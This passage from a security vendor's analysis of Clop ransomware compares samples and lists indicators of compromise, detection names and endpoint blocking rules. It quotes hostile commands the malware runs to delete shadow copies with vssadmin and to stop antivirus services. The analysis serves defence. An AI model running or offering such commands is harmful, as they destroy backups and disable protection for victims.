Sample 0403db9fcb37bd8ceec0afd6c3754314 has a compile date of 12 February, 2019 and has the following changes if compared with other samples:

  • The file created has the name “you_offer.txt”.
  • The name of the device in the fake call to “EraseTape” and “DefineDosDeviceA” functions is “..1”.
  • An atom searched for nothing has the name of “$$$$”.
  • The mutex name is “MoneyP#666”.
  • The resources crypted with the ransom note and the bat file are called “SIXSIX1” for the batch file and the another one for the ransom note “SIXSIX”.
  • The name of the batch file is “clearsystems-10-1.bat”.
  • The key for the XOR operation to decrypt the ransom note and the batch file is:

“Clopfdwsjkjr23LKhuifdhwui73826ygGKUJFHGdwsieflkdsj324765tZPKQWLjwNVBFHewiuhryui32JKG”

  • The batch file is different to the other versions, in this case not changing the boot config of the target victim.

FIGURE 16. Another version of the batch file

  • The email addresses to contact are: icarsole@protonmail.com and unlock@eaqltech.su .
  • As a curiosity, this ransom note has a line that another does not have: “Every day of delay will cost you additional +0.5 BTC” (about 1500-1700 $).

The 3ea56f82b66b26dc66ee5382d2b6f05d sample has the following points of difference:

  • The name of the file created is “popup.txt”.
  • The DefineDosDeviceA name is “1234567890”
  • The mutex is “CLOP#666”.
  • The date of compiled this sample is 7 of February.
  • The name of the bat file is “resort0-0-0-1-1-0-bat”.
  • This sample does not have support for Windows XP because a API that does not exist in Windows XP.
  • The Atom string is “27”.

Sample 846f93fcb65c9e01d99b867fea384edc , has these differences:

  • The name of the file created is “HotGIrls”.
  • The DosDevice name is “GVSDFDS”.
  • Atom name: KLHJGWSEUiokgvs.
  • Batch file name “clearnetworksdns-11-22-33.bat”.
  • The email address to contact: unlock@eqaltech.su, unlock@royalmail.su and lestschelager@protonmail.com.
  • The ransom note does not have the previous string of increasing the price, but the maximum number of files that can be decrypted is 7 instead of 6..

As the reader can understand, Clop changes very quickly in strings and name of resources to make it more complex to detect the malware.

We also observed that the .BAT files were not present in earlier Clop ransomware versions.

Global Spread

Based on the versions of Clop we discovered we detected telemetry hits in the following countries:

  • Switzerland
  • Great Britain
  • Belgium
  • United States
  • The Netherlands
  • Croatia
  • Porto Rico
  • Germany
  • Turkey
  • Russia
  • Denmark
  • Mexico
  • Canada
  • Dominican Republic

Vaccine

The function to check a file or a folder name using the custom hash algorithm can be a problem for the malware execution due if one of them is found in execution, the malware will avoid it. If this happens with a folder, all the files inside that folder will be skipped as well.

As the algorithm and the hash is based on 32bits and only in upper case characters, it is very easy to create a collision as we know the target hashes and the algorithm

It cannot be used as vaccine on itself, but it can be useful to protect against the malware if the most critical files are inside of a collision folder name.

FIGURE 17. Collision of hashes

In the screenshot “BOOT” is a correct name for the hash, but the others are collisions.

This malware has a lot of changes per version that avoid making a normal vaccine using mutex, etc.

The Odd One in the Family

That not all ransomware is created equally, especially goes for Clop. Earlier in this blog we have highlighted some interesting choices the developers made when it came to detecting language settings, processes and the use of batch files to delete the shadow volume copies. We found in the analysis some unique functions compared with other ransomware families.

However, Clop does embrace some of the procedures we have seen with other ransomware families by not listing the ransom amount or mentioning a bitcoin address.

Victims must communicate via email instead of with a central command and control server hosting decryption keys. In the newer versions of Clop, victims are required to state their company name and site in the email communications. We are not absolutely sure why this is, but it might be an effort to improve victim tracking.

Looking at the Clop ransom note, it shares TTPs with other ransomware families; e.g. it mimics the Ryuk ransomware and contains similarities with BitPaymer, however the code and functions are quite different between them.

Coverage

Customers of McAfee gateway and endpoint products are protected against this version.

  • GenericRXHA-RK!3FE02FDD2439
  • GenericRXHA-RK!160FD326A825
  • Trojan-Ransom
  • Ransom-Clop!73FBFBB0FB34
  • Ransom-Clop!0403DB9FCB37
  • Ransom-Clop!227A9F493134
  • Ransom-Clop!A93B3DAA9460
  • GenericRXHA-RK!35792C550176
  • GenericRXHA-RK!738314AA6E07
  • RDN/Generic.dx
  • bub
  • BAT/Ransom-Clob
  • BAT/Ransom-Blob

McAfee ENS customers can create expert rules to prevent batch command execution by the ransomware. A few examples are given below for reference.

The following expert rule can be used to prevent the malware from deleting the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).

When the expert rule is applied at the endpoint, deletion of shadow volume fails with the following error message:

The malware also tries to stop McAfee services using command “net stop McShield /y”. The following expert rule can be used to prevent the malware from stopping McAfee Services:

When the expert rule is applied at the endpoint, the attempt to stop McAfee service using net command fails with the following error message:

Indicators of Compromise

The samples use the following MITRE ATT&CK™ techniques:

  • Execution through API (Batch file for example).
  • Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process.
  • File and directory discovery: to search files to encrypt.
  • Encrypt files.
  • Process discovery: enumerating all processes on the endpoint to kill some special ones.
  • Create files.
  • Create mutants.

Conclusion

Clop ransomware shows some characteristics that enterprises are its intended targets instead of end consumers. The authors displayed some creative technical solutions, to detect the victim’s language settings and installed programs. On the other hand, we also noticed some weird decisions when it came to coding certain functionalities in the ransomware. Unfortunately, it is not the first time that criminals will make money with badly programmed malware.

Clop is constantly evolving and even though we do not know what new changes will be implemented in the future, McAfee ATR will keep a close watch.

IOCs

  • bc59ff12f71e9c8234c5e335d48f308207f6accfad3e953f447e7de1504e57af
  • 31829479fa5b094ca3cfd0222e61295fff4821b778e5a7bd228b0c31f8a3cc44
  • 35b0b54d13f50571239732421818c682fbe83075a4a961b20a7570610348aecc
  • e48900dc697582db4655569bb844602ced3ad2b10b507223912048f1f3039ac6
  • 00e815ade8f3ad89a7726da8edd168df13f96ccb6c3daaf995aa9428bfb9ecf1
  • 2f29950640d024779134334cad79e2013871afa08c7be94356694db12ee437e2
  • c150954e5fdfc100fbb74258cad6ef2595c239c105ff216b1d9a759c0104be04
  • 408af0af7419f67d396f754f01d4757ea89355ad19f71942f8d44c0d5515eec8
  • 0d19f60423cb2128555e831dc340152f9588c99f3e47d64f0bb4206a6213d579
  • 7ada1228c791de703e2a51b1498bc955f14433f65d33342753fdb81bb35e5886
  • 8e1bbe4cedeb7c334fe780ab3fb589fe30ed976153618ac3402a5edff1b17d64
  • d0cde86d47219e9c56b717f55dcdb01b0566344c13aa671613598cab427345b9
  • cff818453138dcd8238f87b33a84e1bc1d560dea80c8d2412e1eb3f7242b27da
  • 929b7bf174638ff8cb158f4e00bc41ed69f1d2afd41ea3c9ee3b0c7dacdfa238
  • 102010727c6fbcd9da02d04ede1a8521ba2355d32da849226e96ef052c080b56
  • 7e91ff12d3f26982473c38a3ae99bfaf0b2966e85046ebed09709b6af797ef66
  • e19d8919f4cb6c1ef8c7f3929d41e8a1a780132cb10f8b80698c8498028d16eb
  • 3ee9b22827cb259f3d69ab974c632cefde71c61b4a9505cec06823076a2f898e

The post Clop Ransomware appeared first on McAfee Blogs.